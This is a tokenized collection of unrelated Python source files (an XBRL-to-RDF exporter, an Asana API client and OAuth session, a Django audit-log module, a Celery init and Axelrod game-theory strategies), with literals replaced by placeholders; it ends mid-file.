targetRole ) <EOL> _relProp [ '<STR_LIT>' ] = URIRef ( targetRelationshipSetUri ) <EOL> else : <EOL> targetRelSetKey = relationshipSetKey <EOL> targetRelSet = relationshipSet <EOL> if doVertices : <EOL> relUri = None <EOL> else : <EOL> _relProp [ '<STR_LIT>' ] = sourceUri <EOL> _relProp [ '<STR_LIT:to>' ] = targetUri <EOL> _arcrole = os . path . basename ( rel . arcrole ) <EOL> relUri = URIRef ( "<STR_LIT>" . format ( <EOL> self . reportURI , <EOL> _arcrole , <EOL> os . path . basename ( rel . linkrole ) , <EOL> sourceId , <EOL> targetId ) ) <EOL> _relProp [ '<STR_LIT>' ] = relUri <EOL> relPredNS = Namespace ( "<STR_LIT>" <EOL> . format ( _arcrole ) ) <EOL> g . bind ( _arcrole , relPredNS ) <EOL> _relProp [ '<STR_LIT>' ] = relPredNS [ os . path . basename ( rel . linkrole ) ] <EOL> if parentRelUri is not None : <EOL> g . add ( ( parentRelUri , Relationship . child , relUri ) ) <EOL> _relProp [ '<STR_LIT>' ] = relationshipSetKey <EOL> relE . append ( _relProp ) <EOL> seq += <NUM_LIT:1> <EOL> seq = walkTree ( targetRelSet . fromModelObject ( toModelObject ) , relUri , seq , depth + <NUM_LIT:1> , targetRelSetKey , targetRelSet , visited , targetRelSetUri , doVertices ) <EOL> visited . remove ( rel ) <EOL> return seq <EOL> for doVertices in range ( <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> for i , relationshipSetKey in enumerate ( self . relationshipSets ) : <EOL> arcrole , linkrole , linkqname , arcqname = relationshipSetKey <EOL> if arcrole not in ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) and linkrole and linkqname and arcqname : <EOL> relSetUri = relSetURIs [ relationshipSetKey ] <EOL> relationshipSet = self . modelXbrl . relationshipSet ( * relationshipSetKey ) <EOL> seq = <NUM_LIT:1> <EOL> for rootConcept in relationshipSet . rootConcepts : <EOL> seq = walkTree ( relationshipSet . 
fromModelObject ( rootConcept ) , None , seq , <NUM_LIT:1> , relationshipSetKey , relationshipSet , set ( ) , relSetUri , doVertices ) <EOL> if doVertices : <EOL> if resources : <EOL> for resource in resources : <EOL> resourceUri = modelObjectUri ( resource ) <EOL> g . add ( ( resourceUri , RDF . type , XBRL . resource ) ) <EOL> g . add ( ( resourceUri , XBRL . value , L ( resource . stringValue ) ) ) <EOL> if resource . role : <EOL> g . add ( ( resourceUri , XBRL . role , L ( resource . role ) ) ) <EOL> self . insertAspectProxies ( aspectQnamesUsed , g ) <EOL> else : <EOL> for j , rel in enumerate ( relE ) : <EOL> relUri = rel [ '<STR_LIT>' ] <EOL> g . add ( ( rel [ '<STR_LIT>' ] , rel [ '<STR_LIT>' ] , rel [ '<STR_LIT:to>' ] ) ) <EOL> g . add ( ( relUri , RDF . type , XBRL . relationship ) ) <EOL> relSetUri = relSetURIs [ rel [ '<STR_LIT>' ] ] <EOL> g . add ( ( relUri , XBRL . relSet , relSetUri ) ) <EOL> g . add ( ( relSetUri , XBRL . relationship , relUri ) ) <EOL> if rel . get ( '<STR_LIT>' , <NUM_LIT:0> ) == <NUM_LIT:1> : <EOL> g . add ( ( relSetUri , XBRL . root , relUri ) ) <EOL> for k , v in rel . items ( ) : <EOL> if k not in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> g . add ( ( relUri , Relationship [ k ] , v ) ) <EOL> resources = None <EOL> def insertValidationResults ( self , g ) : <EOL> logEntries = [ ] <EOL> for handler in logging . getLogger ( "<STR_LIT>" ) . handlers : <EOL> if hasattr ( handler , "<STR_LIT>" ) : <EOL> logEntries = handler . dbHandlerLogEntries ( ) <EOL> break <EOL> messages = [ ] <EOL> messageRefs = [ ] <EOL> firstLogMessage = True <EOL> for i , logEntry in enumerate ( logEntries ) : <EOL> if firstLogMessage : <EOL> self . showStatus ( "<STR_LIT>" ) <EOL> firstLogMessage = False <EOL> messageUri = URIRef ( "<STR_LIT>" . format ( self . reportURI , i + <NUM_LIT:1> ) ) <EOL> g . add ( ( messageUri , RDF . type , XBRL . Message ) ) <EOL> g . add ( ( messageUri , XBRL . 
code , L ( logEntry [ '<STR_LIT:code>' ] ) ) ) <EOL> g . add ( ( messageUri , XBRL . level , L ( logEntry [ '<STR_LIT>' ] ) ) ) <EOL> g . add ( ( messageUri , XBRL . value , L ( logEntry [ '<STR_LIT:message>' ] [ '<STR_LIT:text>' ] ) ) ) <EOL> g . add ( ( messageUri , XBRL . report , self . reportURI ) ) <EOL> g . add ( ( self . reportURI , XBRL . message , messageUri ) ) <EOL> for ref in logEntry [ '<STR_LIT>' ] : <EOL> modelObject = self . modelXbrl . modelObject ( ref . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> aspectObj = None <EOL> if isinstance ( modelObject , ModelFact ) : <EOL> objUri = modelObjectUri ( modelObject ) <EOL> elif isinstance ( modelObject , ModelConcept ) : <EOL> self . insertAspectProxies ( ( modelObject . qname , ) , g ) <EOL> objUri = self . aspectQnameProxyURI ( modelObject . qname ) <EOL> elif isinstance ( modelObject , ModelRelationship ) : <EOL> sourceId = qnamePrefix_Name ( modelObject . fromModelObject . qname ) <EOL> toModelObject = modelObject . toModelObject <EOL> if isinstance ( toModelObject , ModelConcept ) : <EOL> targetId = qnamePrefix_Name ( toModelObject . qname ) <EOL> elif isinstance ( toModelObject , ModelResource ) : <EOL> targetId = toModelObject . modelDocument . basename + '<STR_LIT:#>' + XmlUtil . elementFragmentIdentifier ( toModelObject ) <EOL> else : <EOL> continue <EOL> objUri = URIRef ( "<STR_LIT>" . format ( <EOL> self . reportURI , <EOL> os . path . basename ( modelObject . arcrole ) , <EOL> os . path . basename ( modelObject . linkrole ) , <EOL> sourceId , <EOL> targetId ) ) <EOL> else : <EOL> continue <EOL> g . add ( ( objUri , XBRL . ref , messageUri ) ) <EOL> g . add ( ( messageUri , XBRL . message , objUri ) ) </s>
<s> from types import ModuleType <EOL> import json <EOL> import platform <EOL> import time <EOL> import requests <EOL> from . import error , resources , session , __version__ <EOL> from . page_iterator import CollectionPageIterator <EOL> try : <EOL> import urllib . parse as urlparse <EOL> except ImportError : <EOL> import urllib as urlparse <EOL> RESOURCE_CLASSES = { } <EOL> for name , module in resources . __dict__ . items ( ) : <EOL> if isinstance ( module , ModuleType ) and name . capitalize ( ) in module . __dict__ : <EOL> RESOURCE_CLASSES [ name ] = module . __dict__ [ name . capitalize ( ) ] <EOL> STATUS_MAP = { } <EOL> for name , Klass in error . __dict__ . items ( ) : <EOL> if isinstance ( Klass , type ) and issubclass ( Klass , error . AsanaError ) : <EOL> STATUS_MAP [ Klass ( ) . status ] = Klass <EOL> class Client : <EOL> """<STR_LIT>""" <EOL> DEFAULTS = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : <NUM_LIT:50> , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : <NUM_LIT:5> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> RETRY_DELAY = <NUM_LIT:1.0> <EOL> RETRY_BACKOFF = <NUM_LIT> <EOL> CLIENT_OPTIONS = set ( DEFAULTS . keys ( ) ) <EOL> QUERY_OPTIONS = set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> REQUEST_OPTIONS = set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:data>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> API_OPTIONS = set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> ALL_OPTIONS = CLIENT_OPTIONS | QUERY_OPTIONS | REQUEST_OPTIONS | API_OPTIONS <EOL> def __init__ ( self , session = None , auth = None , ** options ) : <EOL> """<STR_LIT>""" <EOL> self . session = session or requests . Session ( ) <EOL> self . auth = auth <EOL> self . options = _merge ( self . DEFAULTS , options ) <EOL> for name , Klass in RESOURCE_CLASSES . 
items ( ) : <EOL> setattr ( self , name , Klass ( self ) ) <EOL> def request ( self , method , path , ** options ) : <EOL> """<STR_LIT>""" <EOL> options = self . _merge_options ( options ) <EOL> url = options [ '<STR_LIT>' ] + path <EOL> retry_count = <NUM_LIT:0> <EOL> request_options = self . _parse_request_options ( options ) <EOL> self . _add_version_header ( request_options ) <EOL> while True : <EOL> try : <EOL> response = getattr ( self . session , method ) ( url , auth = self . auth , ** request_options ) <EOL> if response . status_code in STATUS_MAP : <EOL> raise STATUS_MAP [ response . status_code ] ( response ) <EOL> elif response . status_code >= <NUM_LIT> and response . status_code < <NUM_LIT> : <EOL> raise error . ServerError ( response ) <EOL> else : <EOL> if options [ '<STR_LIT>' ] : <EOL> return response . json ( ) <EOL> else : <EOL> return response . json ( ) [ '<STR_LIT:data>' ] <EOL> except error . RetryableAsanaError as e : <EOL> if retry_count < options [ '<STR_LIT>' ] : <EOL> self . _handle_retryable_error ( e , retry_count ) <EOL> retry_count += <NUM_LIT:1> <EOL> else : <EOL> raise e <EOL> def _handle_retryable_error ( self , e , retry_count ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( e , error . RateLimitEnforcedError ) : <EOL> time . sleep ( e . retry_after ) <EOL> else : <EOL> time . sleep ( self . RETRY_DELAY * ( self . RETRY_BACKOFF ** retry_count ) ) <EOL> def get ( self , path , query , ** options ) : <EOL> """<STR_LIT>""" <EOL> api_options = self . _parse_api_options ( options , query_string = True ) <EOL> query_options = self . _parse_query_options ( options ) <EOL> parameter_options = self . _parse_parameter_options ( options ) <EOL> query = _merge ( query_options , api_options , parameter_options , query ) <EOL> return self . request ( '<STR_LIT>' , path , params = query , ** options ) <EOL> def get_collection ( self , path , query , ** options ) : <EOL> """<STR_LIT>""" <EOL> options = self . 
_merge_options ( options ) <EOL> if options [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> return CollectionPageIterator ( self , path , query , options ) . items ( ) <EOL> if options [ '<STR_LIT>' ] is None : <EOL> return self . get ( path , query , ** options ) <EOL> raise Exception ( '<STR_LIT>' + str ( options [ '<STR_LIT>' ] ) ) <EOL> def post ( self , path , data , ** options ) : <EOL> """<STR_LIT>""" <EOL> parameter_options = self . _parse_parameter_options ( options ) <EOL> body = { <EOL> '<STR_LIT:data>' : _merge ( parameter_options , data ) , <EOL> '<STR_LIT>' : self . _parse_api_options ( options ) <EOL> } <EOL> return self . request ( '<STR_LIT>' , path , data = body , headers = { '<STR_LIT>' : '<STR_LIT:application/json>' } , ** options ) <EOL> def put ( self , path , data , ** options ) : <EOL> """<STR_LIT>""" <EOL> parameter_options = self . _parse_parameter_options ( options ) <EOL> body = { <EOL> '<STR_LIT:data>' : _merge ( parameter_options , data ) , <EOL> '<STR_LIT>' : self . _parse_api_options ( options ) <EOL> } <EOL> return self . request ( '<STR_LIT>' , path , data = body , headers = { '<STR_LIT>' : '<STR_LIT:application/json>' } , ** options ) <EOL> def delete ( self , path , data , ** options ) : <EOL> """<STR_LIT>""" <EOL> return self . request ( '<STR_LIT>' , path , ** options ) <EOL> def _merge_options ( self , * objects ) : <EOL> """<STR_LIT>""" <EOL> return _merge ( self . options , * objects ) <EOL> def _parse_query_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> return self . _select_options ( options , self . QUERY_OPTIONS ) <EOL> def _parse_parameter_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> return self . _select_options ( options , self . ALL_OPTIONS , invert = True ) <EOL> def _parse_api_options ( self , options , query_string = False ) : <EOL> """<STR_LIT>""" <EOL> api_options = self . _select_options ( options , self . 
API_OPTIONS ) <EOL> if query_string : <EOL> query_api_options = { } <EOL> for key in api_options : <EOL> if isinstance ( api_options [ key ] , ( list , tuple ) ) : <EOL> query_api_options [ '<STR_LIT>' + key ] = '<STR_LIT:U+002C>' . join ( api_options [ key ] ) <EOL> else : <EOL> query_api_options [ '<STR_LIT>' + key ] = api_options [ key ] <EOL> return query_api_options <EOL> else : <EOL> return api_options <EOL> def _parse_request_options ( self , options ) : <EOL> """<STR_LIT>""" <EOL> request_options = self . _select_options ( options , self . REQUEST_OPTIONS ) <EOL> if '<STR_LIT>' in request_options : <EOL> params = request_options [ '<STR_LIT>' ] <EOL> for key in params : <EOL> if isinstance ( params [ key ] , bool ) : <EOL> params [ key ] = json . dumps ( params [ key ] ) <EOL> if '<STR_LIT:data>' in request_options : <EOL> if '<STR_LIT>' in request_options [ '<STR_LIT:data>' ] and len ( request_options [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] ) == <NUM_LIT:0> : <EOL> del request_options [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] <EOL> request_options [ '<STR_LIT:data>' ] = json . dumps ( request_options [ '<STR_LIT:data>' ] ) <EOL> return request_options <EOL> def _select_options ( self , options , keys , invert = False ) : <EOL> """<STR_LIT>""" <EOL> options = self . _merge_options ( options ) <EOL> result = { } <EOL> for key in options : <EOL> if ( invert and key not in keys ) or ( not invert and key in keys ) : <EOL> result [ key ] = options [ key ] <EOL> return result <EOL> def _add_version_header ( self , options ) : <EOL> """<STR_LIT>""" <EOL> headers = options . setdefault ( '<STR_LIT>' , { } ) <EOL> headers [ '<STR_LIT>' ] = self . _versionHeader ( ) <EOL> _cached_version_header = None <EOL> def _versionHeader ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . _cached_version_header : <EOL> self . _cached_version_header = urlparse . urlencode ( <EOL> self . _versionValues ( ) ) <EOL> return self . 
_cached_version_header <EOL> def _versionValues ( self ) : <EOL> """<STR_LIT>""" <EOL> return { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : __version__ , <EOL> '<STR_LIT>' : platform . python_version ( ) , <EOL> '<STR_LIT>' : platform . system ( ) , <EOL> '<STR_LIT>' : platform . release ( ) <EOL> } <EOL> @ classmethod <EOL> def basic_auth ( Klass , apiKey ) : <EOL> """<STR_LIT>""" <EOL> return Klass ( auth = requests . auth . HTTPBasicAuth ( apiKey , '<STR_LIT>' ) ) <EOL> @ classmethod <EOL> def access_token ( Klass , accessToken ) : <EOL> """<STR_LIT>""" <EOL> return Klass ( session . AsanaOAuth2Session ( token = { '<STR_LIT>' : accessToken } ) ) <EOL> @ classmethod <EOL> def oauth ( Klass , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return Klass ( session . AsanaOAuth2Session ( ** kwargs ) ) <EOL> def _merge ( * objects ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> [ result . update ( obj ) for obj in objects ] <EOL> return result </s>
import requests
import requests_oauthlib


class AsanaOAuth2Session(requests_oauthlib.OAuth2Session):
    """OAuth2 session pinned to Asana's authorize/token endpoints."""

    # Fixed endpoints for the OAuth2 dance.
    authorize_url = '<STR_LIT>'
    token_url = '<STR_LIT>'

    def __init__(self, client_secret=None, **kwargs):
        """Remember the client secret; defer everything else to the base session."""
        super(AsanaOAuth2Session, self).__init__(**kwargs)
        self.client_secret = client_secret

    def authorization_url(self):
        """Build the authorization URL against the fixed authorize endpoint."""
        parent = super(AsanaOAuth2Session, self)
        return parent.authorization_url(self.authorize_url)

    def fetch_token(self, **kwargs):
        """Exchange credentials for a token at the fixed token endpoint,
        supplying the stored client secret."""
        parent = super(AsanaOAuth2Session, self)
        return parent.fetch_token(self.token_url, client_secret=self.client_secret, **kwargs)
<s> from __future__ import unicode_literals <EOL> import copy <EOL> import datetime <EOL> from django . db import models <EOL> from django . utils . functional import curry <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . conf import settings <EOL> from audit_log . models . fields import LastUserField <EOL> from audit_log import settings as local_settings <EOL> try : <EOL> from django . utils . timezone import now as datetime_now <EOL> assert datetime_now <EOL> except ImportError : <EOL> import datetime <EOL> datetime_now = datetime . datetime . now <EOL> class LogEntryObjectDescriptor ( object ) : <EOL> def __init__ ( self , model ) : <EOL> self . model = model <EOL> def __get__ ( self , instance , owner ) : <EOL> kwargs = dict ( ( f . attname , getattr ( instance , f . attname ) ) <EOL> for f in self . model . _meta . fields <EOL> if hasattr ( instance , f . attname ) ) <EOL> return self . model ( ** kwargs ) <EOL> class AuditLogManager ( models . Manager ) : <EOL> def __init__ ( self , model , attname , instance = None , ) : <EOL> super ( AuditLogManager , self ) . __init__ ( ) <EOL> self . model = model <EOL> self . instance = instance <EOL> self . attname = attname <EOL> if instance is not None and not hasattr ( instance , '<STR_LIT>' % attname ) : <EOL> setattr ( instance , '<STR_LIT>' % attname , True ) <EOL> def enable_tracking ( self ) : <EOL> if self . instance is None : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> setattr ( self . instance , '<STR_LIT>' % self . attname , True ) <EOL> def disable_tracking ( self ) : <EOL> if self . instance is None : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> setattr ( self . instance , '<STR_LIT>' % self . attname , False ) <EOL> def is_tracking_enabled ( self ) : <EOL> if local_settings . DISABLE_AUDIT_LOG : <EOL> return False <EOL> if self . 
instance is None : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> return getattr ( self . instance , '<STR_LIT>' % self . attname ) <EOL> def get_queryset ( self ) : <EOL> if self . instance is None : <EOL> return super ( AuditLogManager , self ) . get_queryset ( ) <EOL> f = { self . instance . _meta . pk . name : self . instance . pk } <EOL> return super ( AuditLogManager , self ) . get_queryset ( ) . filter ( ** f ) <EOL> class AuditLogDescriptor ( object ) : <EOL> def __init__ ( self , model , manager_class , attname ) : <EOL> self . model = model <EOL> self . manager_class = manager_class <EOL> self . attname = attname <EOL> def __get__ ( self , instance , owner ) : <EOL> if instance is None : <EOL> return self . manager_class ( self . model , self . attname ) <EOL> return self . manager_class ( self . model , self . attname , instance ) <EOL> class AuditLog ( object ) : <EOL> manager_class = AuditLogManager <EOL> def __init__ ( self , exclude = [ ] ) : <EOL> self . _exclude = exclude <EOL> def contribute_to_class ( self , cls , name ) : <EOL> self . manager_name = name <EOL> models . signals . class_prepared . connect ( self . finalize , sender = cls ) <EOL> def create_log_entry ( self , instance , action_type ) : <EOL> manager = getattr ( instance , self . manager_name ) <EOL> attrs = { } <EOL> for field in instance . _meta . fields : <EOL> if field . attname not in self . _exclude : <EOL> attrs [ field . attname ] = getattr ( instance , field . attname ) <EOL> manager . create ( action_type = action_type , ** attrs ) <EOL> def post_save ( self , instance , created , ** kwargs ) : <EOL> if getattr ( instance , self . manager_name ) . is_tracking_enabled ( ) : <EOL> self . create_log_entry ( instance , created and '<STR_LIT:I>' or '<STR_LIT>' ) <EOL> def post_delete ( self , instance , ** kwargs ) : <EOL> if getattr ( instance , self . manager_name ) . is_tracking_enabled ( ) : <EOL> self . 
create_log_entry ( instance , '<STR_LIT:D>' ) <EOL> def finalize ( self , sender , ** kwargs ) : <EOL> log_entry_model = self . create_log_entry_model ( sender ) <EOL> models . signals . post_save . connect ( self . post_save , sender = sender , weak = False ) <EOL> models . signals . post_delete . connect ( self . post_delete , sender = sender , weak = False ) <EOL> descriptor = AuditLogDescriptor ( log_entry_model , self . manager_class , self . manager_name ) <EOL> setattr ( sender , self . manager_name , descriptor ) <EOL> def copy_fields ( self , model ) : <EOL> """<STR_LIT>""" <EOL> fields = { '<STR_LIT>' : model . __module__ } <EOL> for field in model . _meta . fields : <EOL> if not field . name in self . _exclude : <EOL> field = copy . deepcopy ( field ) <EOL> if isinstance ( field , models . AutoField ) : <EOL> field . __class__ = models . IntegerField <EOL> if field . primary_key : <EOL> field . serialize = True <EOL> if isinstance ( field , models . OneToOneField ) : <EOL> field . __class__ = models . ForeignKey <EOL> if field . primary_key or field . unique : <EOL> field . primary_key = False <EOL> field . _unique = False <EOL> field . db_index = True <EOL> if field . rel and field . rel . related_name : <EOL> field . rel . related_name = '<STR_LIT>' % field . rel . related_name <EOL> elif field . rel : <EOL> try : <EOL> if field . rel . get_accessor_name ( ) : <EOL> field . rel . related_name = '<STR_LIT>' % field . rel . get_accessor_name ( ) <EOL> except : <EOL> pass <EOL> fields [ field . name ] = field <EOL> return fields <EOL> def get_logging_fields ( self , model ) : <EOL> """<STR_LIT>""" <EOL> rel_name = '<STR_LIT>' % model . _meta . object_name . lower ( ) <EOL> def entry_instance_to_unicode ( log_entry ) : <EOL> try : <EOL> result = '<STR_LIT>' % ( model . _meta . object_name , <EOL> log_entry . object_state , <EOL> log_entry . get_action_type_display ( ) . lower ( ) , <EOL> log_entry . 
action_date , <EOL> ) <EOL> except AttributeError : <EOL> result = '<STR_LIT>' % ( model . _meta . object_name , <EOL> log_entry . get_action_type_display ( ) . lower ( ) , <EOL> log_entry . action_date <EOL> ) <EOL> return result <EOL> action_user_field = LastUserField ( related_name = rel_name , editable = False ) <EOL> if [ model . _meta . app_label , model . __name__ ] == getattr ( settings , '<STR_LIT>' , '<STR_LIT>' ) . split ( "<STR_LIT:.>" ) : <EOL> action_user_field = LastUserField ( related_name = rel_name , editable = False , to = '<STR_LIT>' ) <EOL> return { <EOL> '<STR_LIT>' : models . AutoField ( primary_key = True ) , <EOL> '<STR_LIT>' : models . DateTimeField ( default = datetime_now , editable = False , blank = False ) , <EOL> '<STR_LIT>' : action_user_field , <EOL> '<STR_LIT>' : models . CharField ( max_length = <NUM_LIT:1> , editable = False , choices = ( <EOL> ( '<STR_LIT:I>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , _ ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT:D>' , _ ( '<STR_LIT>' ) ) , <EOL> ) ) , <EOL> '<STR_LIT>' : LogEntryObjectDescriptor ( model ) , <EOL> '<STR_LIT>' : entry_instance_to_unicode , <EOL> } <EOL> def get_meta_options ( self , model ) : <EOL> """<STR_LIT>""" <EOL> result = { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) , <EOL> '<STR_LIT>' : model . _meta . app_label , <EOL> } <EOL> from django . db . models . options import DEFAULT_NAMES <EOL> if '<STR_LIT>' in DEFAULT_NAMES : <EOL> result . update ( { '<STR_LIT>' : ( ) } ) <EOL> return result <EOL> def create_log_entry_model ( self , model ) : <EOL> """<STR_LIT>""" <EOL> attrs = self . copy_fields ( model ) <EOL> attrs . update ( self . get_logging_fields ( model ) ) <EOL> attrs . update ( Meta = type ( str ( '<STR_LIT:Meta>' ) , ( ) , self . get_meta_options ( model ) ) ) <EOL> name = str ( '<STR_LIT>' % model . _meta . object_name ) <EOL> return type ( name , ( models . Model , ) , attrs ) </s>
# Import the Celery application when this package loads so that task
# decorators bind to it (standard Celery project-integration pattern).
from __future__ import absolute_import
from .celery import app as celery_app
<s> """<STR_LIT>""" <EOL> from math import sqrt <EOL> import random <EOL> from axelrod import Actions , Game , Player , init_args , flip_action , random_choice <EOL> from . memoryone import MemoryOnePlayer <EOL> C , D = Actions . C , Actions . D <EOL> class Davis ( Player ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> classifier = { <EOL> '<STR_LIT>' : float ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> @ init_args <EOL> def __init__ ( self , rounds_to_cooperate = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> Player . __init__ ( self ) <EOL> self . _rounds_to_cooperate = rounds_to_cooperate <EOL> def strategy ( self , opponent ) : <EOL> """<STR_LIT>""" <EOL> if len ( self . history ) < self . _rounds_to_cooperate : <EOL> return C <EOL> if opponent . defections : <EOL> return D <EOL> return C <EOL> class RevisedDowning ( Player ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> classifier = { <EOL> '<STR_LIT>' : float ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> @ init_args <EOL> def __init__ ( self , revised = True ) : <EOL> Player . __init__ ( self ) <EOL> self . revised = revised <EOL> self . good = <NUM_LIT:1.0> <EOL> self . bad = <NUM_LIT:0.0> <EOL> self . nice1 = <NUM_LIT:0> <EOL> self . nice2 = <NUM_LIT:0> <EOL> self . total_C = <NUM_LIT:0> <EOL> self . total_D = <NUM_LIT:0> <EOL> def strategy ( self , opponent ) : <EOL> round_number = len ( self . history ) + <NUM_LIT:1> <EOL> if self . revised : <EOL> if round_number == <NUM_LIT:1> : <EOL> self . move = C <EOL> return self . move <EOL> elif not self . revised : <EOL> if round_number <= <NUM_LIT:2> : <EOL> self . move = D <EOL> return self . move <EOL> if round_number > <NUM_LIT:2> : <EOL> if self . 
history [ - <NUM_LIT:1> ] == D : <EOL> if opponent . history [ - <NUM_LIT:1> ] == C : <EOL> self . nice2 += <NUM_LIT:1> <EOL> self . total_D += <NUM_LIT:1> <EOL> self . bad = float ( self . nice2 ) / self . total_D <EOL> else : <EOL> if opponent . history [ - <NUM_LIT:1> ] == C : <EOL> self . nice1 += <NUM_LIT:1> <EOL> self . total_C += <NUM_LIT:1> <EOL> self . good = float ( self . nice1 ) / self . total_C <EOL> c = <NUM_LIT> * self . good - <NUM_LIT> * self . bad - <NUM_LIT:2> <EOL> alt = <NUM_LIT> * self . good - <NUM_LIT> * self . bad - <NUM_LIT:1> <EOL> if ( c >= <NUM_LIT:0> and c >= alt ) : <EOL> self . move = C <EOL> elif ( c >= <NUM_LIT:0> and c < alt ) or ( alt >= <NUM_LIT:0> ) : <EOL> self . move = flip_action ( self . move ) <EOL> else : <EOL> self . move = D <EOL> return self . move <EOL> def reset ( self ) : <EOL> Player . reset ( self ) <EOL> self . good = <NUM_LIT:1.0> <EOL> self . bad = <NUM_LIT:0.0> <EOL> self . nice1 = <NUM_LIT:0> <EOL> self . nice2 = <NUM_LIT:0> <EOL> self . total_C = <NUM_LIT:0> <EOL> self . total_D = <NUM_LIT:0> <EOL> class Feld ( Player ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:200> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> @ init_args <EOL> def __init__ ( self , start_coop_prob = <NUM_LIT:1.0> , end_coop_prob = <NUM_LIT:0.5> , <EOL> rounds_of_decay = <NUM_LIT:200> ) : <EOL> """<STR_LIT>""" <EOL> Player . __init__ ( self ) <EOL> self . _start_coop_prob = start_coop_prob <EOL> self . _end_coop_prob = end_coop_prob <EOL> self . _rounds_of_decay = rounds_of_decay <EOL> def _cooperation_probability ( self ) : <EOL> """<STR_LIT>""" <EOL> diff = ( self . _end_coop_prob - self . _start_coop_prob ) <EOL> slope = diff / float ( self . _rounds_of_decay ) <EOL> rounds = len ( self . history ) <EOL> return max ( self . _start_coop_prob + slope * rounds , <EOL> self . 
_end_coop_prob ) <EOL> def strategy ( self , opponent ) : <EOL> if not opponent . history : <EOL> return C <EOL> if opponent . history [ - <NUM_LIT:1> ] == D : <EOL> return D <EOL> p = self . _cooperation_probability ( ) <EOL> return random_choice ( p ) <EOL> class Grofman ( Player ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> classifier = { <EOL> '<STR_LIT>' : float ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def strategy ( self , opponent ) : <EOL> round_number = len ( self . history ) + <NUM_LIT:1> <EOL> if round_number < <NUM_LIT:3> : <EOL> return C <EOL> if round_number < <NUM_LIT:8> : <EOL> return opponent . history [ - <NUM_LIT:1> ] <EOL> if self . history [ - <NUM_LIT:1> ] == opponent . history [ - <NUM_LIT:1> ] : <EOL> return C <EOL> return random_choice ( <NUM_LIT> / <NUM_LIT:7> ) <EOL> class Joss ( MemoryOnePlayer ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> @ init_args <EOL> def __init__ ( self , p = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> four_vector = ( p , <NUM_LIT:0> , p , <NUM_LIT:0> ) <EOL> self . p = p <EOL> super ( Joss , self ) . __init__ ( four_vector ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . name , round ( self . p , <NUM_LIT:2> ) ) <EOL> class Nydegger ( Player ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def __init__ ( self ) : <EOL> self . As = [ <NUM_LIT:1> , <NUM_LIT:6> , <NUM_LIT:7> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> ] <EOL> self . 
